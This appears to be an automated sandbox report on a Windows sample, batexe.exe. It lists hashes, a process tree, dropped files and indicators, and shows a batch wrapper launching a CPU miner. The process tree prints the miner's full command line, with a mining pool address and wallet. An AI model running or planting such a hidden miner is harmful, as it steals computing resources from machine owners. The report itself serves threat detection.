73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
301s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
20/02/2024, 20:21

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2944	b2e.exe
1784	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1784	cpuminer-sse2.exe
1784	cpuminer-sse2.exe
1784	cpuminer-sse2.exe
1784	cpuminer-sse2.exe
1784	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2656-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 2944	2656	batexe.exe	75
PID 2656 wrote to memory of 2944	2656	batexe.exe	75
PID 2656 wrote to memory of 2944	2656	batexe.exe	75
PID 2944 wrote to memory of 4628	2944	b2e.exe	76
PID 2944 wrote to memory of 4628	2944	b2e.exe	76
PID 2944 wrote to memory of 4628	2944	b2e.exe	76
PID 4628 wrote to memory of 1784	4628	cmd.exe	79
PID 4628 wrote to memory of 1784	4628	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Users\Admin\AppData\Local\Temp\A25A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A25A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A25A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A4BC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A25A.tmp\b2e.exe

Filesize
1.4MB

MD5
c5e09858066f182b7f5bdcb61d9b36fc

SHA1
7a1de79ffcfa17a7a86a01f8d5046eaf970b8905

SHA256
b5ede4ee58898940fa268a8aa17da9fc31eae634a8c95afcb2412ae199e8f4b6

SHA512
70e4e7cf5ec9df418480b0773c325e489749cbf6b5af491b24f6a6b2298cb043f681689531e70666787d42723d096d57012f1bccf317367908ce68a1420a6dfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\A25A.tmp\b2e.exe

Filesize
1024KB

MD5
55d3fcf113506e85b6cf485f08b11290

SHA1
539d601fdd7e37fe22412d8c73023e21293ac62c

SHA256
519083ea4de496637895b9c3dd7fa5d9fc1140325272570f09aa0d2bad46f2d3

SHA512
62c0dc6a36ef819eede73c8b041fbdf579ec0ae399654a73a4628555bb84c4e1fdcf314deb659f41986204e2d92acd886dd8735a24a150a309d4035b58a33ee4

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4BC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
99b2c19bec15fd1ef378bd7e2c33e329

SHA1
a1982f78c713da34e1fc8e718b4829e2d2c096c1

SHA256
96fb933a65ec47a14d979fe4e09185ce6182bdd29df3bf8995da3f5c0f310e42

SHA512
32bf59450030a9cb998a84a349fb7dd793ce4db2bc552d750e19f089d67e20018eb5882945d769932a8529f035e678b70963add1345c964b5b61d708f433a927

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
66679a566ea02a83a428b6c3266b8d60

SHA1
637e9d00be60ff13a3b814b95e75d99f85c63fab

SHA256
65c2e554ed241883d35cfb359bafd259ecd1a8c2919e69dccb0641c5c8091e57

SHA512
34a941d590c1a031d89eac0d0606abcfb8617e8b3b89257f20fec74a71caf81c0b021163f4c8af28fddfe5881d9cf265a90220cce0b5652ab1de76db86963149

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
811KB

MD5
f68a89c6828d46158e25326287724107

SHA1
ca1f01efd9ee8867ecd5d6292e46445bd330e355

SHA256
401110a284cd85f43f2a91c563134fec46e1c7abc9a492114a75eb40347ddce7

SHA512
22963e2c3f67e4725cb3bb2d67d7420327f75e93e128f8000a70597cde1ea3ff0597d79807fc553daaacabd2f23be1123c4d59f92eda655d72ead85d66026a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
6d422f61bb419e8e42789bae92b89c49

SHA1
382fabf3cb5680fe002844d9f0b900b11cc0a66d

SHA256
08e9e547a0200977a8b690605cb8a45b8ffa4d8b6b9a10b1b1b7e86d3a16614f

SHA512
91151d2c8652a654d6ab5c8641a8e98938e1f021ec2a36fed2a5109a813d02e2064775fffd1b066a9a85b1adbab72a8068b71644f7abf95f22b088ea60465c0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
896KB

MD5
4ece07a08273d0d0db84220926c3d32f

SHA1
d90712e2e643311a963676e87f6afad0c421d895

SHA256
d82c02350e5ca5ebe35d4349a16c3c9986aaecd8be71c05a00b1af09039a4cf3

SHA512
fa010b4c3c0e6d38bb281b4541c0e8b124e05d2feaa6dc11cb6e9c1d85145d5885a5cd61c1bca283f2d9f30295b197343311306acc9d5393aef64793067cdcab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
748KB

MD5
e3570f2233af6cb499533a62294c48ad

SHA1
b0282a2b1a2e18b87315928b4b2cc6d2b6e823e2

SHA256
7b0ffc597617476336c27192b0bfdaca0b67488197bf66727c1c2ce834242213

SHA512
9a7f7b6a662143c9d5962e5e10e4310ea87b5a35867e332e45890aa74e97c189e6d5f9724ce9e289d0cb738299424155d1c66fc8d8ddeeae61da4648c5872409

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
776KB

MD5
988eb2bc6e9a2790560d6e6c73b4e1a2

SHA1
83b3bd7df958ab5efcc862960aacc1d8000c247a

SHA256
fd6711c35880b849062456673862dd799db50652aba5043f74cc60e4c5f5ab7c

SHA512
70a1cf7c2eee3f1c70d810661d4d3ff567dd61427bacea36be8112581b41d75d13de9b09aa664bdfc173d0670813ab0435988cec88b2d28bfab977260516c6ba

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
594KB

MD5
d1b4fea0105a2dfdd4213056d41384e5

SHA1
f22746089830832fcc7963ca2aa548be0c540d70

SHA256
41224d3cd57b77e070460384742f51c916a727cab06543da1324c98f5398ef6c

SHA512
024025280d0a6a4756ad81dbcb3a45948f9889f155c73afa968d8080f125eff455f43f0802d147975b5546c008097d10fc5785f165d00e4eae626150448cd437

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
512KB

MD5
5fd46a66845c804b88dcd97ffcd66652

SHA1
9556ce5607bdd245c8e4d6a24b8217def653f57b

SHA256
b7fd85a2268a4d62fa15fde3d9e51d6fa3bc865cb4d8e5fdca309be7b027f193

SHA512
0896697d588401a6d29c30e77574ece4f0ba699b082b1bad93964748313a5903eb4994ec81c61bfcbd75f2be3f5200dadda3fd1454381cc5874a9c8952ebeedc

Download Submit
memory/1784-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1784-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1784-43-0x000000006DB00000-0x000000006DB98000-memory.dmp

Filesize
608KB

Download
memory/1784-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1784-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1784-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2656-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2944-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2944-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download